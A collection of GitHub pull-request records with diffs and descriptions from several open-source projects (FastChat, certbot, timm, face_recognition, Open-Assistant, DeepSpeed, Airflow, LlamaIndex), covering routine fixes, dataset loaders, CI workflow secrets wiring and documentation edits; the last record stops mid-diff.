Fix the pooling method of BGE embedding model | diff --git a/fastchat/model/model_adapter.py b/fastchat/model/model_adapter.py
index bb268e093e..2a2797bfdb 100644
--- a/fastchat/model/model_adapter.py
+++ b/fastchat/model/model_adapter.py
@@ -1702,6 +1702,8 @@ def load_model(self, model_path: str, from_pretrained_kwargs: dict):
model.config.max_sequence_length = min(
model.config.max_position_embeddings, tokenizer.model_max_length
)
+ model.use_cls_pooling = True
+ model.eval()
return model, tokenizer
def get_default_conv_template(self, model_path: str) -> Conversation:
diff --git a/fastchat/serve/model_worker.py b/fastchat/serve/model_worker.py
index dac6ac8b42..683a78556d 100644
--- a/fastchat/serve/model_worker.py
+++ b/fastchat/serve/model_worker.py
@@ -164,9 +164,13 @@ def __process_embed_chunk(self, input_ids, attention_mask, **model_type_dict):
data = model_output.hidden_states[-1].transpose(0, 1)
else:
data = model_output.hidden_states[-1]
- mask = attention_mask.unsqueeze(-1).expand(data.size()).float()
- masked_embeddings = data * mask
- sum_embeddings = torch.sum(masked_embeddings, dim=1)
+
+ if hasattr(self.model, "use_cls_pooling") and self.model.use_cls_pooling:
+ sum_embeddings = data[:, 0]
+ else:
+ mask = attention_mask.unsqueeze(-1).expand(data.size()).float()
+ masked_embeddings = data * mask
+ sum_embeddings = torch.sum(masked_embeddings, dim=1)
token_num = torch.sum(attention_mask).item()
return sum_embeddings, token_num
@@ -211,10 +215,14 @@ def get_embeddings(self, params):
base64_encode = params.get("encoding_format", None)
if self.embed_in_truncate:
- chunk_embeddings, token_num = self.__process_embed_chunk(
+ embedding, token_num = self.__process_embed_chunk(
input_ids, attention_mask, **model_type_dict
)
- embedding = chunk_embeddings / token_num
+ if (
+ not hasattr(self.model, "use_cls_pooling")
+ or not self.model.use_cls_pooling
+ ):
+ embedding = embedding / token_num
normalized_embeddings = F.normalize(embedding, p=2, dim=1)
ret["token_num"] = token_num
else:
@@ -224,10 +232,41 @@ def get_embeddings(self, params):
chunk_input_ids = input_ids[:, i : i + self.context_len]
chunk_attention_mask = attention_mask[:, i : i + self.context_len]
+ # add cls token and mask to get cls embedding
+ if (
+ hasattr(self.model, "use_cls_pooling")
+ and self.model.use_cls_pooling
+ ):
+ cls_tokens = (
+ torch.zeros(
+ (chunk_input_ids.size(0), 1),
+ dtype=chunk_input_ids.dtype,
+ device=chunk_input_ids.device,
+ )
+ + tokenizer.cls_token_id
+ )
+ chunk_input_ids = torch.cat(
+ [cls_tokens, chunk_input_ids], dim=-1
+ )
+ mask = torch.ones(
+ (chunk_attention_mask.size(0), 1),
+ dtype=chunk_attention_mask.dtype,
+ device=chunk_attention_mask.device,
+ )
+ chunk_attention_mask = torch.cat(
+ [mask, chunk_attention_mask], dim=-1
+ )
+
chunk_embeddings, token_num = self.__process_embed_chunk(
chunk_input_ids, chunk_attention_mask, **model_type_dict
)
- all_embeddings.append(chunk_embeddings)
+ if (
+ hasattr(self.model, "use_cls_pooling")
+ and self.model.use_cls_pooling
+ ):
+ all_embeddings.append(chunk_embeddings * token_num)
+ else:
+ all_embeddings.append(chunk_embeddings)
all_token_num += token_num
all_embeddings_tensor = torch.stack(all_embeddings)
| <!-- Thank you for your contribution! -->
<!-- Please add a reviewer to the assignee section when you create a PR. If you don't have the access to it, we will shortly find a reviewer and assign them to your PR. -->
## Why are these changes needed?
The current implementation of BGE is incorrect. Unlike mean pooling, BGE uses the last hidden state of the CLS token as the sentence embedding. This PR adds a new attribute `use_cls_pooling` to the model adapter and implements CLS pooling in model_worker.py.
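The difference between the two pooling strategies can be sketched in pure Python (an illustration only; the real code in `model_worker.py` does the same thing with torch tensors of shape `[batch, seq, dim]`):

```python
def mean_pool(hidden, mask):
    # Average each sequence's hidden states over its non-padded positions.
    out = []
    for seq, m in zip(hidden, mask):
        dim = len(seq[0])
        total = [0.0] * dim
        count = sum(m)
        for vec, keep in zip(seq, m):
            if keep:
                total = [t + v for t, v in zip(total, vec)]
        out.append([t / count for t in total])
    return out

def cls_pool(hidden):
    # BGE-style pooling: take the hidden state at position 0 (the CLS token).
    return [seq[0] for seq in hidden]
```

For `hidden = [[[1.0, 2.0], [3.0, 4.0], [0.0, 0.0]]]` with mask `[[1, 1, 0]]`, mean pooling yields `[[2.0, 3.0]]` while CLS pooling yields `[[1.0, 2.0]]`.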
<!-- Please give a short summary of the change and the problem this solves. -->
## Related issue number (if applicable)
<!-- For example: "Closes #1234" -->
## Checks
- [ ] I've run `format.sh` to lint the changes in this PR.
- [x] I've included any doc changes needed.
- [x] I've made sure the relevant tests are passing (if applicable).
| https://api.github.com/repos/lm-sys/FastChat/pulls/2926 | 2024-01-17T03:34:03Z | 2024-01-24T07:58:26Z | 2024-01-24T07:58:26Z | 2024-01-24T07:58:26Z | 903 | lm-sys/FastChat | 41,682 |
Skip Mattermost Job for Forked Repos | diff --git a/.github/workflows/merged.yaml b/.github/workflows/merged.yaml
index d6dbe83c6e2..52f3e1bc4fd 100644
--- a/.github/workflows/merged.yaml
+++ b/.github/workflows/merged.yaml
@@ -7,7 +7,8 @@ on:
jobs:
if_merged:
- if: github.event.pull_request.merged == true
+ # Forked repos can not access Mattermost secret.
+ if: github.event.pull_request.merged == true && !github.event.pull_request.head.repo.fork
runs-on: ubuntu-latest
steps:
- name: Create Mattermost Message
| Reason: forked repos can't access the Mattermost secret needed to properly send a message to the channel.
Open to suggestions; the push event is very limited in scope, as documented [here](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#push).
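The gate added in the workflow can be sketched in Python terms (hypothetical payload shape, mirroring the `github.event` context the `if:` condition reads):

```python
# Sketch of the merged-PR gate: notify only for merged PRs from non-fork heads.
def should_notify(event):
    pr = event["pull_request"]
    return bool(pr["merged"]) and not pr["head"]["repo"]["fork"]
```

Merged PRs from forks are skipped, since their workflow runs cannot read the repository secret anyway.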
| https://api.github.com/repos/certbot/certbot/pulls/9739 | 2023-07-24T19:14:06Z | 2023-07-24T20:12:28Z | 2023-07-24T20:12:28Z | 2023-07-24T20:12:34Z | 151 | certbot/certbot | 3,606 |
[doc build] Use secrets | diff --git a/.github/workflows/build_documentation.yml b/.github/workflows/build_documentation.yml
index 167b7d610b..b4ef7415c7 100644
--- a/.github/workflows/build_documentation.yml
+++ b/.github/workflows/build_documentation.yml
@@ -14,8 +14,8 @@ jobs:
commit_sha: ${{ github.sha }}
package: pytorch-image-models
package_name: timm
- repo_owner: rwightman
path_to_docs: pytorch-image-models/hfdocs/source
version_tag_suffix: ""
secrets:
- token: ${{ secrets.HUGGINGFACE_PUSH }}
\ No newline at end of file
+ token: ${{ secrets.HUGGINGFACE_PUSH }}
+ hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
\ No newline at end of file
diff --git a/.github/workflows/build_pr_documentation.yml b/.github/workflows/build_pr_documentation.yml
index 2b44619f69..058d06141f 100644
--- a/.github/workflows/build_pr_documentation.yml
+++ b/.github/workflows/build_pr_documentation.yml
@@ -15,6 +15,5 @@ jobs:
pr_number: ${{ github.event.number }}
package: pytorch-image-models
package_name: timm
- repo_owner: rwightman
path_to_docs: pytorch-image-models/hfdocs/source
version_tag_suffix: ""
diff --git a/.github/workflows/delete_doc_comment.yml b/.github/workflows/delete_doc_comment.yml
index c05e94c5fb..72801c856e 100644
--- a/.github/workflows/delete_doc_comment.yml
+++ b/.github/workflows/delete_doc_comment.yml
@@ -1,13 +1,13 @@
-name: Delete dev documentation
+name: Delete doc comment
on:
- pull_request:
- types: [ closed ]
-
+ workflow_run:
+ workflows: ["Delete doc comment trigger"]
+ types:
+ - completed
jobs:
delete:
uses: huggingface/doc-builder/.github/workflows/delete_doc_comment.yml@main
- with:
- pr_number: ${{ github.event.number }}
- package: timm
\ No newline at end of file
+ secrets:
+ comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
\ No newline at end of file
diff --git a/.github/workflows/delete_doc_comment_trigger.yml b/.github/workflows/delete_doc_comment_trigger.yml
new file mode 100644
index 0000000000..5e39e25397
--- /dev/null
+++ b/.github/workflows/delete_doc_comment_trigger.yml
@@ -0,0 +1,12 @@
+name: Delete doc comment trigger
+
+on:
+ pull_request:
+ types: [ closed ]
+
+
+jobs:
+ delete:
+ uses: huggingface/doc-builder/.github/workflows/delete_doc_comment_trigger.yml@main
+ with:
+ pr_number: ${{ github.event.number }}
\ No newline at end of file
diff --git a/.github/workflows/upload_pr_documentation.yml b/.github/workflows/upload_pr_documentation.yml
new file mode 100644
index 0000000000..237ae8eae4
--- /dev/null
+++ b/.github/workflows/upload_pr_documentation.yml
@@ -0,0 +1,16 @@
+name: Upload PR Documentation
+
+on:
+ workflow_run:
+ workflows: ["Build PR Documentation"]
+ types:
+ - completed
+
+jobs:
+ build:
+ uses: huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml@main
+ with:
+ package_name: timm
+ secrets:
+ hf_token: ${{ secrets.HF_DOC_BUILD_PUSH }}
+ comment_bot_token: ${{ secrets.COMMENT_BOT_TOKEN }}
\ No newline at end of file
| Companion PR to https://github.com/huggingface/doc-builder/pull/379
Please feel free to merge it yourself
cc: @nateraw @rwightman @LysandreJik | https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1841 | 2023-06-09T08:47:40Z | 2023-06-09T14:04:07Z | 2023-06-09T14:04:06Z | 2023-06-09T14:04:07Z | 867 | huggingface/pytorch-image-models | 16,233 |
Fix docstrings in api.py | diff --git a/face_recognition/api.py b/face_recognition/api.py
index 9df9e6e6d..58cc48826 100644
--- a/face_recognition/api.py
+++ b/face_recognition/api.py
@@ -65,7 +65,7 @@ def face_distance(face_encodings, face_to_compare):
Given a list of face encodings, compare them to a known face encoding and get a euclidean distance
for each comparison face. The distance tells you how similar the faces are.
- :param faces: List of face encodings to compare
+ :param face_encodings: List of face encodings to compare
:param face_to_compare: A face encoding to compare against
:return: A numpy ndarray with the distance for each face in the same order as the 'faces' array
"""
@@ -125,7 +125,7 @@ def _raw_face_locations_batched(images, number_of_times_to_upsample=1, batch_siz
"""
Returns an 2d array of dlib rects of human faces in a image using the cnn face detector
- :param img: A list of images (each as a numpy array)
+ :param images: A list of images (each as a numpy array)
:param number_of_times_to_upsample: How many times to upsample the image looking for faces. Higher numbers find smaller faces.
:return: A list of dlib 'rect' objects of found face locations
"""
| Just a quickfix on some docstrings in the `face_recognition/api.py` file. | https://api.github.com/repos/ageitgey/face_recognition/pulls/1117 | 2020-04-19T14:53:08Z | 2020-09-26T14:42:34Z | 2020-09-26T14:42:34Z | 2020-09-26T14:42:34Z | 326 | ageitgey/face_recognition | 22,596 |
Add dataset loader for MegaCodeTraining112k & Evol-Instruct-Code-80k-v1 | diff --git a/model/model_training/custom_datasets/instruction.py b/model/model_training/custom_datasets/instruction.py
index c93fad81f1..c6b6acd8dd 100644
--- a/model/model_training/custom_datasets/instruction.py
+++ b/model/model_training/custom_datasets/instruction.py
@@ -1,6 +1,9 @@
"""
These are in the form of 'INSTRUCTION', 'RESPONSE'
"""
+import random
+from typing import Optional
+
from datasets import load_dataset
from model_training.custom_datasets.formatting import DatasetEntry, create_dataset_entry_qa
from model_training.custom_datasets.utils import _filter_by_words
@@ -25,40 +28,70 @@
"oa_stackexchange": "donfu/oa-stackexchange",
"tell_a_joke": "mikegarts/oa_tell_a_joke_20000",
"wizardlm_70k": "ehartford/WizardLM_alpaca_evol_instruct_70k_unfiltered",
+ "megacode": "rombodawg/MegaCodeTraining112k",
+ "evol_instruct_code": "nickrosh/Evol-Instruct-Code-80k-v1",
}
class InstructionDataset(Dataset):
- def __init__(self, dataset, cache_dir, split, mode="sft"):
+ def __init__(self, dataset, cache_dir, split, mode="sft", fill_min_length: Optional[int] = None, seed: int = 42):
assert mode in ("sft", "rl")
self.name = dataset
self.mode = mode
+ data_files = None
if dataset == "minimath":
self.instruction_column = "question"
self.response_column = "answer"
- elif dataset == "wizardlm_70k":
+ elif dataset in ("wizardlm_70k", "evol_instruct_code"):
self.instruction_column = "instruction"
self.response_column = "output"
+ elif dataset == "megacode":
+ self.instruction_column = "prompt"
+ self.response_column = "completion"
+ data_files = "RombosCodeTraining112k.json"
else:
self.instruction_column = "INSTRUCTION"
self.response_column = "RESPONSE"
- ds = load_dataset(INSTRUCTION_DATASETS[dataset], cache_dir=cache_dir, split=split)
- self.dataset = []
num_invalid = 0
- for i in range(len(ds)):
- data = ds[i]
+
+ ds = load_dataset(INSTRUCTION_DATASETS[dataset], cache_dir=cache_dir, split=split, data_files=data_files)
+ self.dataset: list[tuple[list[str], list[str]]] = []
+
+ questions, answers = [], []
+ item_len = 0
+
+ rng = random.Random(seed)
+ order = list(range(len(ds)))
+ rng.shuffle(order)
+
+ # filter entries and optionally combine multiple entries
+ for i in order:
+ entry = ds[i]
+ q = entry[self.instruction_column]
+ a = entry[self.response_column]
if (
- data[self.instruction_column] is not None
- and len(data[self.instruction_column].strip()) > 0
- and data[self.response_column] is not None
- and len(data[self.response_column].strip()) > 0
- and _filter_by_words(data[self.instruction_column])
- and _filter_by_words(data[self.response_column])
+ q is not None
+ and len(q.strip()) > 0
+ and a is not None
+ and len(a.strip()) > 0
+ and _filter_by_words(q)
+ and _filter_by_words(a)
):
- self.dataset.append(data)
+ questions.append(q)
+ answers.append(a)
+ item_len += len(a) + len(q)
+
+ if fill_min_length is None or fill_min_length < item_len:
+ self.dataset.append((questions, answers))
+ item_len = 0
+ questions, answers = [], []
else:
num_invalid += 1
+
+ if len(questions) > 0 and len(answers) > 0:
+ self.dataset.append((questions, answers))
+
if num_invalid > 0:
print(f"[Warning] {num_invalid} entries of {dataset} were invalid.")
@@ -66,8 +99,9 @@ def __len__(self):
return len(self.dataset)
def __getitem__(self, idx) -> DatasetEntry:
- data = self.dataset[idx]
- lang = None
+ questions, answers = self.dataset[idx]
+
+ lang: str | None = None
# use "en" for datasets which have more than 95% English messages
if self.name in [
"humaneval_mbpp_codegen_qa",
@@ -78,9 +112,10 @@ def __getitem__(self, idx) -> DatasetEntry:
"tell_a_joke",
]:
lang = "en"
+
return create_dataset_entry_qa(
mode=self.mode,
- questions=[data[self.instruction_column]],
- answers=[data[self.response_column]],
+ questions=questions,
+ answers=answers,
lang=lang,
)
diff --git a/model/pyproject.toml b/model/pyproject.toml
index bf5969aa67..a0e9931ba0 100644
--- a/model/pyproject.toml
+++ b/model/pyproject.toml
@@ -32,7 +32,7 @@ dependencies = [
"langcodes==3.3.0",
"tqdm>=4.65.0",
"pydantic==1.10.7",
- "transformers @ git+https://github.com/huggingface/transformers.git@e4a52b6a1536b1d9ef1ac55168bc4fede25605bc",
+ "transformers==4.31.0",
"wandb>=0.15.5",
]
| Added code to load `rombodawg/MegaCodeTraining112k` (key: megacode) and `nickrosh/Evol-Instruct-Code-80k-v1` (key: evol_instruct_code).
Also added an optional `fill_min_length` parameter to the `InstructionDataset` class. If specified, instructions are concatenated until the total string length of prompts and completions exceeds `fill_min_length`. The seed for the random order can optionally be specified (default: 42).
Example:
```
datasets:
- megacode:
fill_min_length: 24000
- evol_instruct_code:
fill_min_length: 24000
```
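The packing behaviour can be sketched as follows (a simplified stand-in for the loader logic, with hypothetical helper names; the real implementation also filters out invalid entries):

```python
import random

def pack_entries(pairs, fill_min_length=None, seed=42):
    # Shuffle entry order with a fixed seed, then group consecutive Q/A pairs
    # until their combined string length exceeds the threshold.
    rng = random.Random(seed)
    order = list(range(len(pairs)))
    rng.shuffle(order)

    packed, questions, answers, item_len = [], [], [], 0
    for i in order:
        q, a = pairs[i]
        questions.append(q)
        answers.append(a)
        item_len += len(q) + len(a)
        # Emit a group once the accumulated length crosses the threshold
        # (or immediately when no threshold is set).
        if fill_min_length is None or item_len > fill_min_length:
            packed.append((questions, answers))
            questions, answers, item_len = [], [], 0
    if questions:
        packed.append((questions, answers))
    return packed
```

Shuffling with a fixed seed keeps the grouping reproducible across runs; with no threshold, every entry stays its own group.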
- updated transformers dependency to `==4.31.0` | https://api.github.com/repos/LAION-AI/Open-Assistant/pulls/3605 | 2023-07-25T18:47:38Z | 2023-07-25T19:20:13Z | 2023-07-25T19:20:13Z | 2023-07-25T19:20:14Z | 1,326 | LAION-AI/Open-Assistant | 37,302 |
Fix spelling errors in DeepSpeed codebase | diff --git a/deepspeed/autotuning/autotuner.py b/deepspeed/autotuning/autotuner.py
index 76cecd5dc5dd..5ff873c582fe 100755
--- a/deepspeed/autotuning/autotuner.py
+++ b/deepspeed/autotuning/autotuner.py
@@ -101,7 +101,7 @@ def __init__(self, args, active_resources):
self.records = {}
self.optimal_cmd = None
- self.optmal_ds_config = None
+ self.optimal_ds_config = None
self.mlflow_parent_id = None
@@ -1093,7 +1093,7 @@ def write_optimal_config(self):
fd.write("\n")
fd.flush()
self.optimal_cmd = cmd
- self.optmal_ds_config = ds_config
+ self.optimal_ds_config = ds_config
logger.info(
f"Wrote the optimal DeepSpeed configuration found by autotuning to {ds_config_path}, and the corresponding DeepSpeed command to {cmd_path}"
)
diff --git a/deepspeed/checkpoint/deepspeed_checkpoint.py b/deepspeed/checkpoint/deepspeed_checkpoint.py
index ef36b0c5ef3f..77634222d292 100644
--- a/deepspeed/checkpoint/deepspeed_checkpoint.py
+++ b/deepspeed/checkpoint/deepspeed_checkpoint.py
@@ -98,11 +98,11 @@ def show_tp_embedding_map(self):
def show_tp_final_norm_map(self):
self._dump_mapping(self.tp_to_final_norm_map, 'tp_to_final_norm_layers')
- def show_pp_tranformer_map(self):
- self._dump_mapping(self.pp_to_transformer_map, 'pp_to_tranformer_layers')
+ def show_pp_transformer_map(self):
+ self._dump_mapping(self.pp_to_transformer_map, 'pp_to_transformer_layers')
def show_transformer_file_map(self):
- self._dump_mapping(self.transformer_file_map, 'rank_to_tranformer_files')
+ self._dump_mapping(self.transformer_file_map, 'rank_to_transformer_files')
def _build_global_state(self):
sd = torch.load(self.mp_rank_files[0], map_location=torch.device('cpu'))
diff --git a/deepspeed/comm/comm.py b/deepspeed/comm/comm.py
index 913dcf84d681..2ae6b581a272 100644
--- a/deepspeed/comm/comm.py
+++ b/deepspeed/comm/comm.py
@@ -5,7 +5,7 @@
"""
DeepSpeed Communication Package: deepspeed.comm
deepspeed.comm
- -- import and use deepspeeed.ops.comm
+ -- import and use deepspeed.ops.comm
-- use torch.distributed directly if both this package and torch.distributed use the same NCCL version
-- use custom collectives
-- can either use torch.dist or ds.ops.comm?
diff --git a/deepspeed/compression/compress.py b/deepspeed/compression/compress.py
index 9c4632f8aef3..a047b5127eb1 100644
--- a/deepspeed/compression/compress.py
+++ b/deepspeed/compression/compress.py
@@ -191,7 +191,7 @@ def student_initialization(student_model, teacher_model, deepspeed_config):
The layer of teacher will be used for student's reinitializedion
Example 1: [1,3,5,7,9], means we want to matches the 2nd/4th/6th/8th/10th layer of teacher to the first 5 layers of student
student_layer (`list` or None)
- The layer of student need to be re-intiialized
+ The layer of student need to be re-initialized
Example 1: None, means we want to reinitialize all the layers
Example 1: [0,1,2,3,4], means we want to reinitialize the first 5 layers
other_module_name (`list of string`)
diff --git a/deepspeed/compression/helper.py b/deepspeed/compression/helper.py
index fdca916e9f15..b06f085b8e1c 100644
--- a/deepspeed/compression/helper.py
+++ b/deepspeed/compression/helper.py
@@ -176,13 +176,13 @@ def is_module_compressible(module, mpu=None):
return ret
-def compression_preparation(model, compression_techinique_list, mpu):
+def compression_preparation(model, compression_technique_list, mpu):
"""
Prepare the compression techniques of a model.
Args:
model (`torch.nn.Module`)
The model to prepare the compression techniques of.
- compression_techinique_list (`list`)
+ compression_technique_list (`list`)
The list of compression techniques to prepare the model to.
list[]
"""
@@ -190,7 +190,7 @@ def compression_preparation(model, compression_techinique_list, mpu):
for module_name, module in model.named_modules():
if is_module_compressible(module, mpu):
module_replacement(model, module_name, mpu=mpu)
- for module_name_lists, _, compression_technique in compression_techinique_list:
+ for module_name_lists, _, compression_technique in compression_technique_list:
for mnl in module_name_lists:
for module_name in mnl:
module_replacement(model, module_name, compression_technique)
diff --git a/deepspeed/compression/utils.py b/deepspeed/compression/utils.py
index 3534f994cd78..481e833bdf8c 100644
--- a/deepspeed/compression/utils.py
+++ b/deepspeed/compression/utils.py
@@ -72,7 +72,7 @@ def forward(ctx, input, num_bits, min_value=None, max_value=None, num_groups=1):
The input which needs to be quantized
num_bits (int, >=4)
Number of bits to use for quantization
- min_value/max_vlue (torch.FloatTensor)
+ min_value/max_value (torch.FloatTensor)
Used for static activation quantization
num_groups (int)
How many groups to partition the quantization into
@@ -114,7 +114,7 @@ def forward(ctx, input, num_bits, min_value=None, max_value=None, num_groups=1):
The input which needs to be quantized
num_bits (int, >=4)
Number of bits to use for quantization
- min_value/max_vlue (torch.FloatTensor)
+ min_value/max_value (torch.FloatTensor)
Used for static activation quantization
num_groups (int)
How many groups to partition the quantization into
@@ -158,7 +158,7 @@ def forward(ctx, input, num_bits, min_value=None, max_value=None, num_groups=1):
The input which needs to be quantized
num_bits (int)
Dummy variable
- min_value/max_vlue (torch.FloatTensor)
+ min_value/max_value (torch.FloatTensor)
Used for static activation quantization; for now they are dummy variable
num_groups (int)
How many groups to partition the quantization into
@@ -199,7 +199,7 @@ def forward(ctx, input, num_bits, min_value=None, max_value=None, num_groups=1):
The input which needs to be quantized
num_bits (int)
Dummy variable
- min_value/max_vlue (torch.FloatTensor)
+ min_value/max_value (torch.FloatTensor)
Used for static activation quantization; for now they are dummy variable
num_groups (int)
How many groups to partition the quantization into
diff --git a/deepspeed/elasticity/config.py b/deepspeed/elasticity/config.py
index 9c574d3537c8..7c6bd42cdfd9 100644
--- a/deepspeed/elasticity/config.py
+++ b/deepspeed/elasticity/config.py
@@ -84,7 +84,7 @@ def __init__(self, param_dict):
raise ElasticityConfigError("Elasticity min_gpus cannot be greater than max_gpus, "
f"given min_gpus: {self.min_gpus}, max_gpus: {self.max_gpus}")
- self.model_parallel_size = param_dict.get(MODEL_PARLLEL_SIZE, MODEL_PARLLEL_SIZE_DEFAULT)
+ self.model_parallel_size = param_dict.get(MODEL_PARALLEL_SIZE, MODEL_PARALLEL_SIZE_DEFAULT)
if self.model_parallel_size < 1:
raise ElasticityConfigError("Model-Parallel size cannot be less than 1, "
f"given model-parallel size: {self.model_parallel_size}")
diff --git a/deepspeed/elasticity/constants.py b/deepspeed/elasticity/constants.py
index 85a38c749b2a..b3134c54b4d6 100644
--- a/deepspeed/elasticity/constants.py
+++ b/deepspeed/elasticity/constants.py
@@ -50,8 +50,8 @@
NUM_GPUS_PER_NODE = 'num_gpus_per_node'
NUM_GPUS_PER_NODE_DEFAULT = 1
-MODEL_PARLLEL_SIZE = "model_parallel_size"
-MODEL_PARLLEL_SIZE_DEFAULT = 1
+MODEL_PARALLEL_SIZE = "model_parallel_size"
+MODEL_PARALLEL_SIZE_DEFAULT = 1
# Minimum running time (minutes) before the scheduler will scale us, 0 implies it's unknown
MIN_TIME = "min_time"
diff --git a/deepspeed/runtime/config.py b/deepspeed/runtime/config.py
index dd9d77b6a158..bc5511226565 100755
--- a/deepspeed/runtime/config.py
+++ b/deepspeed/runtime/config.py
@@ -46,8 +46,8 @@
ELASTICITY,
IGNORE_NON_ELASTIC_BATCH_INFO,
IGNORE_NON_ELASTIC_BATCH_INFO_DEFAULT,
- MODEL_PARLLEL_SIZE,
- MODEL_PARLLEL_SIZE_DEFAULT,
+ MODEL_PARALLEL_SIZE,
+ MODEL_PARALLEL_SIZE_DEFAULT,
NUM_GPUS_PER_NODE,
NUM_GPUS_PER_NODE_DEFAULT,
)
@@ -712,7 +712,7 @@ def __init__(self, config: Union[str, dict], mpu=None):
# Ensure the resource scheduler saw the same elastic config we are using at runtime
ensure_immutable_elastic_config(runtime_elastic_config_dict=elastic_dict)
- self.elastic_model_parallel_size = elastic_dict.get(MODEL_PARLLEL_SIZE, MODEL_PARLLEL_SIZE_DEFAULT)
+ self.elastic_model_parallel_size = elastic_dict.get(MODEL_PARALLEL_SIZE, MODEL_PARALLEL_SIZE_DEFAULT)
if self.elastic_model_parallel_size < 1:
raise ElasticityConfigError("Model-Parallel size cannot be less than 1, "
f"given model-parallel size: {self.elastic_model_parallel_size}")
| Fix spelling errors under `deepspeed/`.
Modified files:
modified: deepspeed/autotuning/autotuner.py
modified: deepspeed/checkpoint/deepspeed_checkpoint.py
modified: deepspeed/comm/comm.py
modified: deepspeed/compression/compress.py
modified: deepspeed/compression/helper.py
modified: deepspeed/compression/utils.py
modified: deepspeed/elasticity/config.py
modified: deepspeed/elasticity/constants.py
modified: deepspeed/runtime/config.py
@microsoft-github-policy-service agree | https://api.github.com/repos/microsoft/DeepSpeed/pulls/3494 | 2023-05-09T10:38:26Z | 2023-05-09T16:54:06Z | 2023-05-09T16:54:06Z | 2023-05-09T23:57:44Z | 2,407 | microsoft/DeepSpeed | 10,828 |
Fix trino hook tests: change int to enum | diff --git a/tests/providers/trino/hooks/test_trino.py b/tests/providers/trino/hooks/test_trino.py
index ac7a6d1a6c649..f17d7419e56da 100644
--- a/tests/providers/trino/hooks/test_trino.py
+++ b/tests/providers/trino/hooks/test_trino.py
@@ -36,7 +36,7 @@
TRINO_DBAPI_CONNECT = 'airflow.providers.trino.hooks.trino.trino.dbapi.connect'
-class TestTrinoHookConn(unittest.TestCase):
+class TestTrinoHookConn:
@patch(BASIC_AUTHENTICATION)
@patch(TRINO_DBAPI_CONNECT)
@patch(HOOK_GET_CONNECTION)
@@ -117,7 +117,7 @@ def assert_connection_called_with(mock_connect, auth=None, verify=True):
schema='hive',
source='airflow',
user='login',
- isolation_level=0,
+ isolation_level=IsolationLevel.AUTOCOMMIT,
auth=None if not auth else auth.return_value,
verify=verify,
)
| Trino hook tests were failing because the mock assertion now appears to use an Enum instead of an int.
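A minimal illustration of the mismatch (stand-in enum; plain `Enum` members do not compare equal to their underlying values, so a call recorded with the enum no longer satisfies an expectation written with the raw int):

```python
from enum import Enum
from unittest.mock import Mock

class IsolationLevel(Enum):  # stand-in for the client library's enum
    AUTOCOMMIT = 0

connect = Mock()
connect(isolation_level=IsolationLevel.AUTOCOMMIT)

assert IsolationLevel.AUTOCOMMIT != 0  # plain Enum members != their values
try:
    connect.assert_called_with(isolation_level=0)  # old int-based expectation
    old_expectation_matches = True
except AssertionError:
    old_expectation_matches = False

# The updated expectation with the enum member matches the recorded call.
connect.assert_called_with(isolation_level=IsolationLevel.AUTOCOMMIT)
```

This is why the test's expected value had to change from `0` to the enum member itself.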
| https://api.github.com/repos/apache/airflow/pulls/20082 | 2021-12-06T18:37:04Z | 2021-12-06T19:34:00Z | 2021-12-06T19:34:00Z | 2022-02-14T21:46:37Z | 229 | apache/airflow | 14,107 |
Update description in docs/examples/managed/zcpDemo.ipynb | diff --git a/docs/community/integrations/managed_indices.md b/docs/community/integrations/managed_indices.md
index 2ec4d23ba4ba9..6e59e94c53598 100644
--- a/docs/community/integrations/managed_indices.md
+++ b/docs/community/integrations/managed_indices.md
@@ -105,11 +105,10 @@ maxdepth: 1
## Zilliz
-First, [sign up](https://cloud.zilliz.com/signup) or use existing Zilliz Cloud account to create a free Serverless Cluster. This is to get the cluster id and API key to grant access to Zilliz Cloud Pipelines service.
+First, set up your [Zilliz Cloud](https://cloud.zilliz.com/signup?utm_source=twitter&utm_medium=social%20&utm_campaign=2023-12-22_social_pipeline-llamaindex_twitter) account and create a free serverless cluster.
+Then copy the Cluster ID and API Key from your account.
-Then set the environment variables `ZILLIZ_CLUSTER_ID` and `ZILLIZ_TOKEN` by copying the value from the [Zilliz Cloud UI](https://raw.githubusercontent.com/milvus-io/bootcamp/2596ea9a4a1a089101a0b46e3cb012b8dfb2eb9a/images/zilliz_api_key_cluster_id.jpeg).
-
-Now you can construct the `ZillizCloudPipelineIndex` to ingest docs and query index as follows:
+Now you can construct `ZillizCloudPipelineIndex` to index docs and query as follows:
```python
import os
@@ -120,9 +119,9 @@ from llama_index.indices import ZillizCloudPipelineIndex
# Load documents from url and build document index
zcp_index = ZillizCloudPipelineIndex.from_document_url(
url="https://publicdataset.zillizcloud.com/milvus_doc.md",
- cluster_id=os.getenv("ZILLIZ_CLUSTER_ID"),
- token=os.getenv("ZILLIZ_TOKEN"),
- metadata={"version": "2.3"},
+ cluster_id="<YOUR_ZILLIZ_CLUSTER_ID>",
+ token="<YOUR_ZILLIZ_API_KEY>",
+ metadata={"version": "2.3"}, # optional
)
# Insert more docs into index, eg. a Milvus v2.2 document
@@ -143,6 +142,12 @@ query_engine_milvus23 = zcp_index.as_query_engine(
),
output_metadata=["version"],
)
+
+question = "Can users delete entities by complex boolean expressions?"
+# Retrieving
+retrieval_result = query_engine_with_filters.retrieve(question)
+# Querying
+answer = query_engine_with_filters.query(question)
```
```{toctree}
diff --git a/docs/examples/managed/zcpDemo.ipynb b/docs/examples/managed/zcpDemo.ipynb
index 7ed859e0847bf..77c89894bc40f 100644
--- a/docs/examples/managed/zcpDemo.ipynb
+++ b/docs/examples/managed/zcpDemo.ipynb
@@ -13,9 +13,9 @@
"id": "db0855d0",
"metadata": {},
"source": [
- "# Managed Index with Zilliz Cloud Pipeline\n",
+ "# Managed Index with Zilliz Cloud Pipelines\n",
"\n",
- "[Zilliz Cloud Pipelines](https://docs.zilliz.com/docs/pipelines) is a robust solution that efficiently transforms unstructured data into a vector database for effective semantic search.\n",
+ "[Zilliz Cloud Pipelines](https://docs.zilliz.com/docs/pipelines) is a scalable API service for retrieval. You can use Zilliz Cloud Pipelines as managed index in `llama-index`. This service can transform documents into vector embeddings and store them in Zilliz Cloud for effective semantic search.\n",
"\n",
"## Setup\n",
"\n",
@@ -37,7 +37,7 @@
"id": "3fc94b2f",
"metadata": {},
"source": [
- "2. Set your [OpenAI](https://platform.openai.com) & [Zilliz Cloud](https://cloud.zilliz.com/) accounts"
